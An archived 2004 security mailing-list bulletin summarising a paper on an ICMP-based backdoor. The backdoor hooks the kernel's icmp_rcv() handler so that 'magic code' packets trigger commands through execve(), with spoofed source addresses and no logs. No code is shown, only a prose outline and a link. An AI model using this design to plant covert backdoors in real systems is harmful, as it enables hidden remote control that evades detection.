[REVS] How To Create An ICMP Based Client/Server Connection Backdoor

• Previous message: SecuriTeam: "[NT] GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 17 Mar 2004 18:41:07 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  How To Create An ICMP Based Client/Server Connection Backdoor
------------------------------------------------------------------------

SUMMARY

This paper will introduce the reader to an ICMP communication type (this
is done by hooking a particular syscall). With this technique is possible
to start a communication client/server without open a port on the remote
system. A basic knowledge of C language and of syscall hooking is
required.

DETAILS

Abstract:
This technique will be used to open a client/server communication, without
opening any ports, by creating a dialog like this:
Client -> Filter -> Interpreter

The filter will hook the "icmp_rcv()" syscall, changing the mode to
receive ICMP packets, by comparing packets' "code_no" with a list of MAGIC
CODES, that we have preset. On the base of the received "code_no", the
filter will call the interpreter, resident on the user-space, by using the
"execve()" call thus the required action will be executed. By using the
environment associated to the corresponding MAGIC CODE.

The client in this case isn't really important; it will only automate the
configuration of ICMP packets and of their "code_no", by using a simple
prompt. Nothing that a simple packets generator couldn't do. This type of
communication is totally anonymous, there will be no logs and the IP
address will be spoofed by using the raw socket ICMP connection.
Unfortunately the commands that we are able to execute on the remote
system are limited to the MAGIC CODE stored on the interpreter and we will
not have our own binded shell.

The code examples are well documented and show the creation of a simple
client server communicating via ICMP packets.

ADDITIONAL INFORMATION

The information has been provided by <mailto:evil@blackangels.it> evil.

The complete papaer can be found at:
<http://www.blackangels.it/Files/Papers/icmprcv.txt>
http://www.blackangels.it/Files/Papers/icmprcv.txt

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]